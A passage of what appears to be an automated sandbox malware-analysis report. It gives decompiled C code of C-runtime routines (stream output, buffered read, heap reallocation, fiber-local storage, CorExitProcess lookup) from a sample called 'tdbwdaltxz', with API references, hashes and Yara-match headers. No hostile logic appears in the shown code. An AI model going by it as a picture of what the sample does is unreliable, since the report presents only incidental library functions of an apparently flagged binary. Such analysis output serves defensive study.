                        										_t66 = E0106FFFD(_t94);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											goto L14;
                        										}
                        									} else {
                        										_t68 = E01062E24();
                        										__eflags = _t97 - _t68 + 0x40;
                        										if(_t97 != _t68 + 0x40) {
                        											L14:
                        											E01070A65(_t97);
                        										} else {
                        											goto L13;
                        										}
                        									}
                        								}
                        								__eflags = _t97[3] & 0x00000108;
                        								if(__eflags == 0) {
                        									_v12 = _a4;
                        									_push(2);
                        									_push( &_v12);
                        									_push(_t94);
                        									_v8 = 2;
                        									_t53 = E0106BEF0(_t75, _t91, _t94, _t97, __eflags);
                        									_t80 = _a4;
                        									_t75 = _t53;
                        									goto L27;
                        								} else {
                        									_t92 = _t97[2];
                        									 *_t97 = _t92 + 2;
                        									_t82 =  *_t97 - _t92;
                        									_v8 = _t82;
                        									_t97[1] = _t97[6] - 2;
                        									__eflags = _t82;
                        									if(__eflags <= 0) {
                        										__eflags = _t94 - 0xffffffff;
                        										if(_t94 == 0xffffffff) {
                        											L22:
                        											_t83 = 0x1080520;
                        										} else {
                        											__eflags = _t94 - 0xfffffffe;
                        											if(_t94 == 0xfffffffe) {
                        												goto L22;
                        											} else {
                        												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t94 >> 5) * 4));
                        											}
                        										}
                        										__eflags =  *(_t83 + 4) & 0x00000020;
                        										if(__eflags == 0) {
                        											goto L25;
                        										} else {
                        											_push(2);
                        											_push(_t75);
                        											_push(_t75);
                        											_push(_t94);
                        											_t59 = E01067780(_t75, _t94, _t97, __eflags);
                        											__eflags = (_t59 & _t92) - 0xffffffff;
                        											if((_t59 & _t92) == 0xffffffff) {
                        												goto L28;
                        											} else {
                        												goto L25;
                        											}
                        										}
                        									} else {
                        										_push(_t82);
                        										_push(_t92);
                        										_push(_t94);
                        										_t75 = E0106BEF0(_t75, _t92, _t94, _t97, __eflags);
                        										L25:
                        										_t80 = _a4;
                        										 *(_t97[2]) = _t80;
                        										L27:
                        										__eflags = _t75 - _v8;
                        										if(_t75 == _v8) {
                        											_t54 = _t80 & 0x0000ffff;
                        										} else {
                        											L28:
                        											_t43 =  &(_t97[3]);
                        											 *_t43 = _t97[3] | 0x00000020;
                        											__eflags =  *_t43;
                        											goto L29;
                        										}
                        									}
                        								}
                        							} else {
                        								_t97[1] = 0;
                        								__eflags = _t79 & 0x00000010;
                        								if((_t79 & 0x00000010) == 0) {
                        									_t97[3] = _t79 | 0x00000020;
                        									L29:
                        									_t54 = 0xffff;
                        								} else {
                        									_t90 = _t79 & 0xfffffffe;
                        									__eflags = _t90;
                        									 *_t97 = _t97[2];
                        									_t97[3] = _t90;
                        									goto L10;
                        								}
                        							}
                        						} else {
                        							 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
                        							goto L6;
                        						}
                        					} else {
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 9;
                        						L6:
                        						_t97[3] = _t97[3] | 0x00000020;
                        						_t54 = 0xffff;
                        					}
                        					return _t54;
                        				} else {
                        					return _t46 | 0xffffffff;
                        				}
                        			}






























                        APIs
                        • __ioinit.LIBCMT ref: 01074BD7
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: 4180551170cf64d5314b2087420eadfc3fe243bf76dd7a9d551d1322a2f5b80a
                        • Instruction ID: 1610157736473a1e1fae61af9aeaa4d07d59c8a1a30f03a90ba830bb9c5c767e
                        • Opcode Fuzzy Hash: 4180551170cf64d5314b2087420eadfc3fe243bf76dd7a9d551d1322a2f5b80a
                        • Instruction Fuzzy Hash: 74416871E0070A9FE7749F6CC881ABA7BE8AF41320F00866DE5E6C76C1D774D8008B18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0106793B(void* __eflags, signed char _a4, signed int* _a8) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t43;
                        				signed int _t44;
                        				signed int _t45;
                        				signed int _t48;
                        				signed int _t52;
                        				void* _t60;
                        				signed int _t62;
                        				void* _t64;
                        				signed int _t67;
                        				signed int _t70;
                        				signed int _t74;
                        				signed int _t76;
                        				void* _t77;
                        				signed int _t85;
                        				void* _t86;
                        				signed int _t87;
                        				signed int _t89;
                        				signed int* _t92;
                        
                        				_t44 = E01066594(_t43);
                        				if(_t44 >= 0) {
                        					_t92 = _a8;
                        					_t45 = E01065573(_t92);
                        					_t74 = _t92[3];
                        					_t89 = _t45;
                        					__eflags = _t74 & 0x00000082;
                        					if(__eflags != 0) {
                        						__eflags = _t74 & 0x00000040;
                        						if(__eflags == 0) {
                        							_t70 = 0;
                        							__eflags = _t74 & 0x00000001;
                        							if((_t74 & 0x00000001) == 0) {
                        								L10:
                        								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                        								_t92[3] = _t48;
                        								_t92[1] = _t70;
                        								__eflags = _t48 & 0x0000010c;
                        								if((_t48 & 0x0000010c) == 0) {
                        									_t60 = E01062E24();
                        									__eflags = _t92 - _t60 + 0x20;
                        									if(_t92 == _t60 + 0x20) {
                        										L13:
                        										_t62 = E0106FFFD(_t89);
                        										__eflags = _t62;
                        										if(_t62 == 0) {
                        											goto L14;
                        										}
                        									} else {
                        										_t64 = E01062E24();
                        										__eflags = _t92 - _t64 + 0x40;
                        										if(_t92 != _t64 + 0x40) {
                        											L14:
                        											E01070A65(_t92);
                        										} else {
                        											goto L13;
                        										}
                        									}
                        								}
                        								__eflags = _t92[3] & 0x00000108;
                        								if((_t92[3] & 0x00000108) == 0) {
                        									__eflags = 1;
                        									_push(1);
                        									_v8 = 1;
                        									_push( &_a4);
                        									_push(_t89);
                        									_t45 = E0106BEF0(_t70, _t86, _t89, _t92, 1);
                        									_t70 = _t45;
                        									goto L27;
                        								} else {
                        									_t87 = _t92[2];
                        									 *_t92 = _t87 + 1;
                        									_t76 =  *_t92 - _t87;
                        									_v8 = _t76;
                        									_t92[1] = _t92[6] - 1;
                        									__eflags = _t76;
                        									if(__eflags <= 0) {
                        										__eflags = _t89 - 0xffffffff;
                        										if(_t89 == 0xffffffff) {
                        											L22:
                        											_t77 = 0x1080520;
                        										} else {
                        											__eflags = _t89 - 0xfffffffe;
                        											if(_t89 == 0xfffffffe) {
                        												goto L22;
                        											} else {
                        												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t89 >> 5) * 4));
                        											}
                        										}
                        										__eflags =  *(_t77 + 4) & 0x00000020;
                        										if(__eflags == 0) {
                        											goto L25;
                        										} else {
                        											_push(2);
                        											_push(_t70);
                        											_push(_t70);
                        											_push(_t89);
                        											_t45 = E01067780(_t70, _t89, _t92, __eflags) & _t87;
                        											__eflags = _t45 - 0xffffffff;
                        											if(_t45 == 0xffffffff) {
                        												goto L28;
                        											} else {
                        												goto L25;
                        											}
                        										}
                        									} else {
                        										_push(_t76);
                        										_push(_t87);
                        										_push(_t89);
                        										_t70 = E0106BEF0(_t70, _t87, _t89, _t92, __eflags);
                        										L25:
                        										_t45 = _a4;
                        										 *(_t92[2]) = _t45;
                        										L27:
                        										__eflags = _t70 - _v8;
                        										if(_t70 == _v8) {
                        											_t52 = _a4 & 0x000000ff;
                        										} else {
                        											L28:
                        											_t40 =  &(_t92[3]);
                        											 *_t40 = _t92[3] | 0x00000020;
                        											__eflags =  *_t40;
                        											goto L29;
                        										}
                        									}
                        								}
                        							} else {
                        								_t92[1] = 0;
                        								__eflags = _t74 & 0x00000010;
                        								if((_t74 & 0x00000010) == 0) {
                        									_t92[3] = _t74 | 0x00000020;
                        									L29:
                        									_t52 = _t45 | 0xffffffff;
                        								} else {
                        									_t85 = _t74 & 0xfffffffe;
                        									__eflags = _t85;
                        									 *_t92 = _t92[2];
                        									_t92[3] = _t85;
                        									goto L10;
                        								}
                        							}
                        						} else {
                        							_t67 = E010647CC(__eflags);
                        							 *_t67 = 0x22;
                        							goto L6;
                        						}
                        					} else {
                        						_t67 = E010647CC(__eflags);
                        						 *_t67 = 9;
                        						L6:
                        						_t92[3] = _t92[3] | 0x00000020;
                        						_t52 = _t67 | 0xffffffff;
                        					}
                        					return _t52;
                        				} else {
                        					return _t44 | 0xffffffff;
                        				}
                        			}



























                        APIs
                        • __ioinit.LIBCMT ref: 0106793F
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: a5e7b5880d0677273ea32939c4bcc670a41777519683311dcaa630fee2232a78
                        • Instruction ID: f43c7404a44f9850386674598a63ed7ce2cd16e4b5c1863153e69f98d1c160e3
                        • Opcode Fuzzy Hash: a5e7b5880d0677273ea32939c4bcc670a41777519683311dcaa630fee2232a78
                        • Instruction Fuzzy Hash: EC411171510B029FD7249BACC891ABE7BEC9F85338F04875DE5E6C62C1E634DA408B21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E004029C1(void* __ecx) {
                        				void* _t8;
                        				void* _t11;
                        				void* _t13;
                        				void* _t14;
                        				void* _t18;
                        				void* _t23;
                        				long _t24;
                        				void* _t27;
                        
                        				_t13 = __ecx;
                        				if( *0x415040 != 0xffffffff) {
                        					_t24 = GetLastError();
                        					_t11 = E00402CA4(_t13,  *0x415040);
                        					_t14 = _t23;
                        					if(_t11 == 0xffffffff) {
                        						L5:
                        						_t11 = 0;
                        					} else {
                        						if(_t11 == 0) {
                        							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
                        								_push(0x28);
                        								_t27 = E004057DE();
                        								_t18 = 1;
                        								if(_t27 == 0) {
                        									L8:
                        									_t11 = 0;
                        									E00402CDF(_t18,  *0x415040, 0);
                        								} else {
                        									_t8 = E00402CDF(_t18,  *0x415040, _t27);
                        									_pop(_t18);
                        									if(_t8 != 0) {
                        										_t11 = _t27;
                        										_t27 = 0;
                        									} else {
                        										goto L8;
                        									}
                        								}
                        								E0040571A(_t27);
                        							} else {
                        								goto L5;
                        							}
                        						}
                        					}
                        					SetLastError(_t24);
                        					return _t11;
                        				} else {
                        					return 0;
                        				}
                        			}












                        APIs
                        • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                        • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                        • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                        • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                        • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 25%
                        			E00404F84(intOrPtr _a4) {
                        				char _v16;
                        				signed int _v20;
                        				signed int _t11;
                        				int _t14;
                        				void* _t16;
                        				void* _t20;
                        				int _t22;
                        				signed int _t23;
                        
                        				_t11 =  *0x415010; // 0xcf17a32a
                        				 *[fs:0x0] =  &_v16;
                        				_v20 = _v20 & 0x00000000;
                        				_t14 =  &_v20;
                        				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
                        				if(_t14 != 0) {
                        					_t14 = GetProcAddress(_v20, "CorExitProcess");
                        					_t22 = _t14;
                        					if(_t22 != 0) {
                        						 *0x40e160(_a4);
                        						_t14 =  *_t22();
                        					}
                        				}
                        				if(_v20 != 0) {
                        					_t14 = FreeLibrary(_v20);
                        				}
                        				 *[fs:0x0] = _v16;
                        				return _t14;
                        			}












                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CF17A32A,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                        • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                        • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                        • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t40;
                        				intOrPtr _t45;
                        				signed int _t48;
                        				void* _t51;
                        				signed int _t55;
                        				intOrPtr _t64;
                        				intOrPtr _t69;
                        				void* _t72;
                        				intOrPtr _t73;
                        				intOrPtr _t89;
                        				void* _t90;
                        				intOrPtr* _t92;
                        				void* _t94;
                        				intOrPtr* _t95;
                        				signed int _t96;
                        				void* _t97;
                        				intOrPtr* _t98;
                        				intOrPtr* _t100;
                        				void* _t103;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t40 =  *0x415010; // 0xcf17a32a
                        				_v8 = _t40 ^ _t96;
                        				_t89 = _a20;
                        				if(_t89 > 0) {
                        					_t69 = E0040AE45(_a16, _t89);
                        					_t103 = _t69 - _t89;
                        					_t4 = _t69 + 1; // 0x1
                        					_t89 = _t4;
                        					if(_t103 >= 0) {
                        						_t89 = _t69;
                        					}
                        				}
                        				_t71 = _a32;
                        				if(_a32 == 0) {
                        					_t71 =  *((intOrPtr*)( *_a4 + 8));
                        					_a32 =  *((intOrPtr*)( *_a4 + 8));
                        				}
                        				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
                        				_t98 = _t97 + 0x18;
                        				_v12 = _t45;
                        				if(_t45 == 0) {
                        					L38:
                        					_pop(_t90);
                        					_pop(_t94);
                        					_pop(_t72);
                        					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
                        				} else {
                        					_t16 = _t45 + _t45 + 8; // 0x8
                        					asm("sbb eax, eax");
                        					_t48 = _t45 + _t45 & _t16;
                        					if(_t48 == 0) {
                        						_t95 = 0;
                        						L36:
                        						_t73 = 0;
                        						L37:
                        						E00407EE5(_t95);
                        						_t45 = _t73;
                        						goto L38;
                        					}
                        					if(_t48 > 0x400) {
                        						_t95 = E00407D48(_t48);
                        						if(_t95 == 0) {
                        							goto L36;
                        						}
                        						 *_t95 = 0xdddd;
                        						L12:
                        						if(_t95 == 0) {
                        							goto L36;
                        						}
                        						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
                        						_t100 = _t98 + 0x18;
                        						if(_t51 == 0) {
                        							goto L36;
                        						}
                        						_t91 = _v12;
                        						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
                        						if(_t73 == 0) {
                        							goto L36;
                        						}
                        						if((_a12 & 0x00000400) == 0) {
                        							_t30 = _t73 + _t73 + 8; // 0x8
                        							asm("sbb eax, eax");
                        							_t55 = _t73 + _t73 & _t30;
                        							if(_t55 == 0) {
                        								_t92 = 0;
                        								L34:
                        								E00407EE5(_t92);
                        								goto L36;
                        							}
                        							if(_t55 > 0x400) {
                        								_t92 = E00407D48(_t55);
                        								if(_t92 == 0) {
                        									goto L34;
                        								}
                        								 *_t92 = 0xdddd;
                        								L26:
                        								_t92 = _t92 + 8;
                        								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
                        									goto L34;
                        								} else {
                        									_push(0);
                        									_push(0);
                        									if(_a28 != 0) {
                        										_push(_a28);
                        										_push(_a24);
                        									} else {
                        										_push(0);
                        										_push(0);
                        									}
                        									_push(_t73);
                        									_push(_t92);
                        									_push(0);
                        									_push(_a32);
                        									_t73 = E00407464();
                        									if(_t73 == 0) {
                        										goto L34;
                        									} else {
                        										E00407EE5(_t92);
                        										goto L37;
                        									}
                        								}
                        							}
                        							E004018F0(_t55);
                        							_t92 = _t100;
                        							if(_t92 == 0) {
                        								goto L34;
                        							}
                        							 *_t92 = 0xcccc;
                        							goto L26;
                        						}
                        						_t64 = _a28;
                        						if(_t64 == 0) {
                        							goto L37;
                        						}
                        						if(_t73 > _t64) {
                        							goto L36;
                        						}
                        						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
                        						if(_t73 != 0) {
                        							goto L37;
                        						}
                        						goto L36;
                        					}
                        					E004018F0(_t48);
                        					_t95 = _t98;
                        					if(_t95 == 0) {
                        						goto L36;
                        					}
                        					 *_t95 = 0xcccc;
                        					goto L12;
                        				}
                        			}





























                        APIs
                        • __alloca_probe_16.LIBCMT ref: 00409B45
                        • __alloca_probe_16.LIBCMT ref: 00409C0E
                        • __freea.LIBCMT ref: 00409C75
                          • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                        • __freea.LIBCMT ref: 00409C88
                        • __freea.LIBCMT ref: 00409C95
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                        • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                        • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                        • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E010630B6(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                        				char* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				void* __ebx;
                        				void* __esi;
                        				signed int _t74;
                        				char _t81;
                        				signed int _t86;
                        				signed int _t88;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t97;
                        				signed int _t98;
                        				char* _t99;
                        				signed int _t100;
                        				signed int _t102;
                        				signed int _t103;
                        				signed int _t104;
                        				char* _t110;
                        				signed int _t113;
                        				signed int _t117;
                        				signed int _t119;
                        				void* _t120;
                        
                        				_t99 = _a4;
                        				_t74 = _a8;
                        				_v8 = _t99;
                        				_v12 = _t74;
                        				if(_a12 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t97 = _a16;
                        				if(_t97 == 0) {
                        					goto L5;
                        				}
                        				_t124 = _t99;
                        				if(_t99 != 0) {
                        					_t119 = _a20;
                        					__eflags = _t119;
                        					if(_t119 == 0) {
                        						L9:
                        						__eflags = _a8 - 0xffffffff;
                        						if(_a8 != 0xffffffff) {
                        							_t74 = E01066CE0(_t99, 0, _a8);
                        							_t120 = _t120 + 0xc;
                        						}
                        						__eflags = _t119;
                        						if(__eflags == 0) {
                        							goto L3;
                        						} else {
                        							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
                        							if(__eflags > 0) {
                        								goto L3;
                        							}
                        							L13:
                        							_t117 = _a12 * _t97;
                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        							_t98 = _t117;
                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        								_t100 = 0x1000;
                        							} else {
                        								_t100 =  *(_t119 + 0x18);
                        							}
                        							_v16 = _t100;
                        							__eflags = _t117;
                        							if(_t117 == 0) {
                        								L41:
                        								return _a16;
                        							} else {
                        								do {
                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        										L24:
                        										__eflags = _t98 - _t100;
                        										if(_t98 < _t100) {
                        											_t81 = E01066B25(_t98, _t119, _t119);
                        											__eflags = _t81 - 0xffffffff;
                        											if(_t81 == 0xffffffff) {
                        												L46:
                        												return (_t117 - _t98) / _a12;
                        											}
                        											_t102 = _v12;
                        											__eflags = _t102;
                        											if(_t102 == 0) {
                        												L42:
                        												__eflags = _a8 - 0xffffffff;
                        												if(__eflags != 0) {
                        													E01066CE0(_a4, 0, _a8);
                        												}
                        												 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
                        												L4:
                        												E0106471D();
                        												goto L5;
                        											}
                        											_t110 = _v8;
                        											 *_t110 = _t81;
                        											_t98 = _t98 - 1;
                        											_t103 = _t102 - 1;
                        											__eflags = _t103;
                        											_v12 = _t103;
                        											_t100 =  *(_t119 + 0x18);
                        											_v8 = _t110 + 1;
                        											_v16 = _t100;
                        											goto L40;
                        										}
                        										__eflags = _t100;
                        										if(_t100 == 0) {
                        											_t86 = 0x7fffffff;
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t86 = _t98;
                        											}
                        										} else {
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t44 = _t98 % _t100;
                        												__eflags = _t44;
                        												_t113 = _t44;
                        												_t91 = _t98;
                        											} else {
                        												_t113 = 0x7fffffff % _t100;
                        												_t91 = 0x7fffffff;
                        											}
                        											_t86 = _t91 - _t113;
                        										}
                        										__eflags = _t86 - _v12;
                        										if(_t86 > _v12) {
                        											goto L42;
                        										} else {
                        											_push(_t86);
                        											_push(_v8);
                        											_push(E01065573(_t119));
                        											_t88 = E01066E85();
                        											_t120 = _t120 + 0xc;
                        											__eflags = _t88;
                        											if(_t88 == 0) {
                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                        												goto L46;
                        											}
                        											__eflags = _t88 - 0xffffffff;
                        											if(_t88 == 0xffffffff) {
                        												L45:
                        												_t64 = _t119 + 0xc;
                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                        												__eflags =  *_t64;
                        												goto L46;
                        											}
                        											_t98 = _t98 - _t88;
                        											__eflags = _t98;
                        											L36:
                        											_v8 = _v8 + _t88;
                        											_v12 = _v12 - _t88;
                        											_t100 = _v16;
                        											goto L40;
                        										}
                        									}
                        									_t94 =  *(_t119 + 4);
                        									_v20 = _t94;
                        									__eflags = _t94;
                        									if(__eflags == 0) {
                        										goto L24;
                        									}
                        									if(__eflags < 0) {
                        										goto L45;
                        									}
                        									__eflags = _t98 - _t94;
                        									if(_t98 < _t94) {
                        										_t94 = _t98;
                        										_v20 = _t98;
                        									}
                        									_t104 = _v12;
                        									__eflags = _t94 - _t104;
                        									if(_t94 > _t104) {
                        										goto L42;
                        									} else {
                        										E01066C53(_v8, _t104,  *_t119, _t94);
                        										_t88 = _v20;
                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                        										_t120 = _t120 + 0x10;
                        										_t98 = _t98 - _t88;
                        										 *_t119 =  *_t119 + _t88;
                        										goto L36;
                        									}
                        									L40:
                        									__eflags = _t98;
                        								} while (_t98 != 0);
                        								goto L41;
                        							}
                        						}
                        					}
                        					_t74 = (_t74 | 0xffffffff) / _a12;
                        					__eflags = _t97 - _t74;
                        					if(_t97 <= _t74) {
                        						goto L13;
                        					}
                        					goto L9;
                        				}
                        				L3:
                        				 *((intOrPtr*)(E010647CC(_t124))) = 0x16;
                        				goto L4;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: 717025f009bde6d845ee9a5dea9d94caa0b4e5ea05f21ed46d7a92af5e39d36a
                        • Instruction ID: 47125dbbc1637f519ac1ec5c5d3dfcc313eff5748792c674951d0e5a43ac30be
                        • Opcode Fuzzy Hash: 717025f009bde6d845ee9a5dea9d94caa0b4e5ea05f21ed46d7a92af5e39d36a
                        • Instruction Fuzzy Hash: 5D51C630A00706DBEB548FAD88846AE7BF9BF51320F148769E9A99E2D0D7719954CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E0106C92A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                        				void* _t7;
                        				long _t8;
                        				intOrPtr* _t9;
                        				intOrPtr* _t12;
                        				long _t20;
                        				long _t31;
                        
                        				if(_a4 != 0) {
                        					_t31 = _a8;
                        					__eflags = _t31;
                        					if(_t31 != 0) {
                        						_push(__ebx);
                        						while(1) {
                        							__eflags = _t31 - 0xffffffe0;
                        							if(_t31 > 0xffffffe0) {
                        								break;
                        							}
                        							__eflags = _t31;
                        							if(_t31 == 0) {
                        								_t31 = _t31 + 1;
                        								__eflags = _t31;
                        							}
                        							_t7 = HeapReAlloc( *0x1081688, 0, _a4, _t31);
                        							_t20 = _t7;
                        							__eflags = _t20;
                        							if(_t20 != 0) {
                        								L17:
                        								_t8 = _t20;
                        							} else {
                        								__eflags =  *0x1081c20 - _t7;
                        								if(__eflags == 0) {
                        									_t9 = E010647CC(__eflags);
                        									 *_t9 = E01064825(GetLastError());
                        									goto L17;
                        								} else {
                        									__eflags = E0106CE35(_t7, _t31);
                        									if(__eflags == 0) {
                        										_t12 = E010647CC(__eflags);
                        										 *_t12 = E01064825(GetLastError());
                        										L12:
                        										_t8 = 0;
                        										__eflags = 0;
                        									} else {
                        										continue;
                        									}
                        								}
                        							}
                        							goto L14;
                        						}
                        						E0106CE35(_t6, _t31);
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 0xc;
                        						goto L12;
                        					} else {
                        						E01064ED2(_a4);
                        						_t8 = 0;
                        					}
                        					L14:
                        					return _t8;
                        				} else {
                        					return E0106C898(__ebx, __edx, __edi, _a8);
                        				}
